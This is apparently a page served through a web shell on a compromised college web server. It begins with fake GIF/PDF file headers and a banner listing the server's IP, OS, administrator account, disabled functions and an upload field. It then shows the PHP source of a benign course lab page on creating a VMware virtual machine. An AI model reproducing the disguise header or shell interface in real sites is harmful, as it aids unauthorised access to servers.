GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/MichaelMalz/CST2608/_Archive/How-To/VMware/ |
Upload File : |
<? // /JimMartinson/CST2608/Labs/Lab01/VMware/index.php $TRACK = "<b>".basename(__FILE__)."</b> (".__FILE__.")\n<ol>\n"; ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path. include("application.phpinc"); include('Course/courseInfo.phpinc'); include('../../../classInfo.phpinc'); $evaluationNumber = 1; $evaluationType = "Lab"; $evaluationTitle = "New Virtual Machine"; $evaluationType = ""; $evaluationTitle = $evaluationTitle; if (strlen($evaluationNumber) == 1) { $evaluationName = $evaluationType."0".$evaluationNumber; $evaluationName = $evaluationType."0".$evaluationNumber; } else { $evaluationName = $evaluationType.$evaluationNumber; $evaluationName = $evaluationType.$evaluationNumber; } if ($evaluationTitle != '') $evaluationTitle = ' - '.$evaluationTitle; $title = $evaluationType." ".$evaluationNumber.": ".$evaluationTitle; $headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title; $pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title; $pageMenu = 'Course/courseMenu.phpinc'; $smallTitle = true; $thisFile = __FILE__; include('common/pageHeader.phpinc'); $sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title; $thisFile = __FILE__; include('common/sectionHeader.phpinc'); ?> <p> <fieldset class="pio"><legend>VMware setup</legend> <ol> <li> Create new virtual machine. Click on <b>New Virtual Machine</b>. <br> <img src="VMware01_CreateNewVirtualMachine.png" alt="VMware Home"> </li> <li> Welcome screen. Click <b>Next</b>. <br> <img src="VMware02_Welcome.png" align="Welcome screen"> </li> <li> Select the Appropriate Conficuration. Leave <b>Typical</b> selected and click <b>Next</b>. <br> <img src="VMware03_Typical.png" alt="Select the Appropriate Conficuration"> </li> <li> Select a Guest Operating System. Select <b>Linux</b> and <b>Ubuntu</b> and click <b>Next</b>. <br> <img src="VMware04_LinuxUbuntu.png" alt="Select a Guest Operating System"> </li> <li> Name the Virtual Machine. Enter a name for the virtual machine (I entered <b>JimServer</b>) and a location for the files (I entered <b>D:\VMware\JimServer</b>) and click <b>Next</b>. <br> <img src="VMware05_NameAndLocation.png" alt="Name the Virtual Machine"> </li> <li> Network Type. Select <b>Use network address translation (NAT)</b> and click <b>Next</b>. <br> <img src="VMware06_NetworkType.png" alt="Network Type"> </li> <li> Specify Disk Capacity. Enter the virtual disk size (I left it at 8GB), Check the <b>Split disk into 2 GB files</b>, and click <b>Finish</b>. <br> <img src="VMware07_SpecifyDiskCapacity.png" alt="Specify Disk Capacity"> </li> <li> Virtual machine created successfully. Thats it! Click <b>Close</b>. <br> <img src="VMware08_Finish.png" alt="Virtual machine created successfully"> </li> </ol> </fieldset> <? $thisFile = __FILE__; include('common/sectionFooter.phpinc'); $thisFile = __FILE__; include('common/pageFooter.phpinc'); if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol></li>\n"; ?>